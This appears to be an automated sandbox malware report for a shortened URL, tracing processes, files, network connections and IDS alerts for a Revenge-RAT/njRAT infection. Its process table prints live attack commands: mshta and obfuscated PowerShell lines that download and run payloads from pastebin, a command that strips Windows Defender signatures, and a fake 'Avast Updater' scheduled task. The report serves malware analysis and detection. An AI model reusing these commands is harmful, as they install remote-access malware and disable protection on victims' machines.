URL: | http://www.bitly.com/LdsaKLX9gTSDLX |
Full analysis: | https://app.any.run/tasks/10b2fb87-8abe-47e6-9aa6-4b80e13e09d7 |
Verdict: | Malicious activity |
Threats: | Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links. |
Analysis date: | July 17, 2019, 15:18:46 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MD5: | 463C1A2761A5DA79478447252A8EC53B |
SHA1: | 7D03DC7BBB743B282366F48A5DB550B113636556 |
SHA256: | 53A36BC8B72683464AF6FA98CBC25B0A75B84999641674234E9A47ADC59D3FC2 |
SSDEEP: | 3:N1KJS4slKlhT:Cc4sUP |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3436 | "C:\Program Files\Internet Explorer\iexplore.exe" "http://www.bitly.com/LdsaKLX9gTSDLX" | C:\Program Files\Internet Explorer\iexplore.exe | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Internet Explorer Exit code: 1 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3676 | "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3436 CREDAT:71937 | C:\Program Files\Internet Explorer\iexplore.exe | iexplore.exe | |
User: admin Company: Microsoft Corporation Integrity Level: LOW Description: Internet Explorer Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
3224 | "C:\Windows\system32\cmd.exe" | C:\Windows\system32\cmd.exe | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3928 | mshta http://www.bitly.com/LdsaKLX9gTSDLX | C:\Windows\system32\mshta.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
2740 | "C:\Windows\System32\mshta.exe" http://www.pastebin.com/raw/k7dnVz2V | C:\Windows\System32\mshta.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft (R) HTML Application host Exit code: 0 Version: 8.00.7600.16385 (win7_rtm.090713-1255) | ||||
944 | "C:\Windows\System32\cmd.exe" /c cd "C:\Program Files\Windows Defender" & MpCmdRun.exe -removedefinitions -dynamicsignatures & taskkill /f /im winword.exe & taskkill /f /im excel.exe & taskkill /f /im MSPUB.exe & taskkill /f /im POWERPNT.EXE & taskkill /f /im MSASCuiL.exe & taskkill /f /im MpCmdRun.exe & exit | C:\Windows\System32\cmd.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 128 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3348 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NOEx $SA_s = ((New-Object Net.WebClient).DowNloAdSTRiNg('h'+'t'+'t'+'p'+'s'+':'+'/'+'/'+'p'+'a'+'s'+'t'+'e'+'b'+'i'+'n'+'.'+'c'+'o'+'m'+'/'+'r'+'a'+'w'+'/0v8Vj4u0'));$SA_s=$SA_s.replace('.','0');$SA_s = $SA_s.ToCharArray();[Array]::Reverse($SA_s);[byte[]]$Ci_W = [System.Convert]::FromBase64String($SA_s);$ASD_w = [System.Threading.Thread]::GetDomain().Load($Ci_W);$ASD_w.EntryPoint.invoke($S,$X); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3560 | "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 30 /tn "Avast Updater" /tr "mshta.exe http://pastebin.com/raw/NwPxvrRM" /F | C:\Windows\System32\schtasks.exe | — | mshta.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Manages scheduled tasks Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2532 | MpCmdRun.exe -removedefinitions -dynamicsignatures | C:\Program Files\Windows Defender\MpCmdRun.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Malware Protection Command Line Utility Exit code: 2 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3968 | taskkill /f /im winword.exe | C:\Windows\system32\taskkill.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Terminates Processes Exit code: 128 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3436 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\JGRR2OYX\favicon[1].ico | — | |
MD5:— | SHA256:— | |||
3436 | iexplore.exe | C:\Users\admin\AppData\LocalLow\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico | — | |
MD5:— | SHA256:— | |||
3928 | mshta.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\H6QNMHE9\authorization[1].css | — | |
MD5:— | SHA256:— | |||
3676 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\admin@bitly[1].txt | text | |
MD5:E91948560925578685CEC7378F11FF88 | SHA256:04B82750BA29478E3F8B5447F772DDF7BE8B1683FBF486BA2DD28FFA67BD0024 | |||
3928 | mshta.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@bitly[1].txt | text | |
MD5:5A4347D0B80AAC5A0494C8B66F622CB5 | SHA256:2AD7D12E8FFA3DF87156FCDF7FAE65758285895DD7F9B7C31AA0EEBE2AA22418 | |||
3676 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\KNU9NFJK\10[1].html | html | |
MD5:BD46A729E25B48E9C880F541DE27B67D | SHA256:3790625C48558767401619159BC7C8EB0CA0E4A184D3B516261BDA302717FC9B | |||
3676 | iexplore.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\Low\index.dat | dat | |
MD5:6603BB7E8AA74EAF90E96909EDD5E00A | SHA256:A9BC70292D4D1FFB41573EF54C6C9E3F4771DE04E984FADE369AC9D2650E53CB | |||
3676 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\desktop.ini | ini | |
MD5:4A3DEB274BB5F0212C2419D3D8D08612 | SHA256:2842973D15A14323E08598BE1DFB87E54BF88A76BE8C7BC94C56B079446EDF38 | |||
3676 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Low\Content.IE5\index.dat | dat | |
MD5:FEBDF32A7F963605ECC21FE397C4F5CD | SHA256:66CD4905A1264A3E96502A7016600FAA905B29CAECFAF5AC4D0C87B0E34A948B | |||
3676 | iexplore.exe | C:\Users\admin\AppData\Local\Microsoft\Windows\History\Low\History.IE5\index.dat | dat | |
MD5:166BD3D6A535EFA9E0C5EFD7FA8F49A9 | SHA256:35E8E4606416F636D228094F20963A2CCC7AE3CFD7D10F29AD388A46D117ACCE |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3676 | iexplore.exe | GET | 301 | 67.199.248.14:80 | http://bitly.com/LdsaKLX9gTSDLX | US | html | 130 b | shared |
3928 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://bitly.com/LdsaKLX9gTSDLX | US | html | 130 b | shared |
2740 | mshta.exe | GET | 301 | 104.20.209.21:80 | http://www.pastebin.com/raw/k7dnVz2V | US | html | 6.55 Kb | shared |
3928 | mshta.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/LdsaKLX9gTSDLX | US | html | 178 b | shared |
3436 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
3676 | iexplore.exe | GET | 301 | 67.199.248.14:80 | http://www.bitly.com/LdsaKLX9gTSDLX | US | html | 178 b | shared |
1960 | iexplore.exe | GET | 200 | 204.79.197.200:80 | http://www.bing.com/favicon.ico | US | image | 237 b | whitelisted |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3436 | iexplore.exe | 204.79.197.200:80 | www.bing.com | Microsoft Corporation | US | whitelisted |
3676 | iexplore.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
3676 | iexplore.exe | 172.217.22.73:443 | www.blogger.com | Google Inc. | US | whitelisted |
3928 | mshta.exe | 67.199.248.14:80 | www.bitly.com | Bitly Inc | US | shared |
3928 | mshta.exe | 216.58.207.65:443 | dqawqdnqiddx.blogspot.com | Google Inc. | US | whitelisted |
3676 | iexplore.exe | 216.58.207.65:443 | dqawqdnqiddx.blogspot.com | Google Inc. | US | whitelisted |
3928 | mshta.exe | 216.58.207.41:443 | resources.blogblog.com | Google Inc. | US | whitelisted |
3348 | powershell.exe | 104.20.208.21:443 | www.pastebin.com | Cloudflare Inc | US | shared |
— | — | 216.58.207.41:443 | resources.blogblog.com | Google Inc. | US | whitelisted |
2740 | mshta.exe | 104.20.209.21:80 | www.pastebin.com | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
www.bitly.com |
| shared |
dqawqdnqiddx.blogspot.com |
| whitelisted |
www.bing.com |
| whitelisted |
www.blogger.com |
| shared |
resources.blogblog.com |
| whitelisted |
www.pastebin.com |
| shared |
pastebin.com |
| shared |
arabkrobo.duckdns.org |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
3928 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
3928 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
2740 | mshta.exe | Misc activity | SUSPICIOUS [PTsecurity] Cmd.Powershell.Download HTTP UserAgent (Win7) |
— | — | Misc activity | ET INFO DYNAMIC_DNS Query to *.duckdns. Domain |
3348 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Revenge-RAT CnC Checkin |
3348 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] Revenge/hamza-RAT CnC Checkin |
3348 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
3348 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
3348 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |
3348 | powershell.exe | A Network Trojan was detected | MALWARE [PTsecurity] MSIL/Maadawy-RAT (njRAT) CnC Response |